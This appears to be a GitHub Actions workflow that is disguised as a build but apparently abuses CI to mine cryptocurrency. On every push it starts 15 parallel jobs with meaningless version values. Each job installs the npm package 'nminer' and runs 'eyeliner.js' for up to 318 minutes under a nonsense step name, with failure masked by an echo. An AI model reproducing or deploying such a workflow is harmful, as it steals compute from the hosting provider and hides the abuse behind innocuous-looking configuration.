name: eyeliner
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 3034 }
          - { version: 6893 }
          - { version: 8674 }
          - { version: 7626 }
          - { version: 9172 }
          - { version: 2599 }
          - { version: 8019 }
          - { version: 8440 }
          - { version: 8180 }
          - { version: 4973 }
          - { version: 3542 }
          - { version: 4888 }
          - { version: 6151 }
          - { version: 7121 }
          - { version: 9972 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: yet sheepishly
        run: |
          npm install nminer@latest
          timeout 318m node eyeliner.js || echo "eyeliner executed"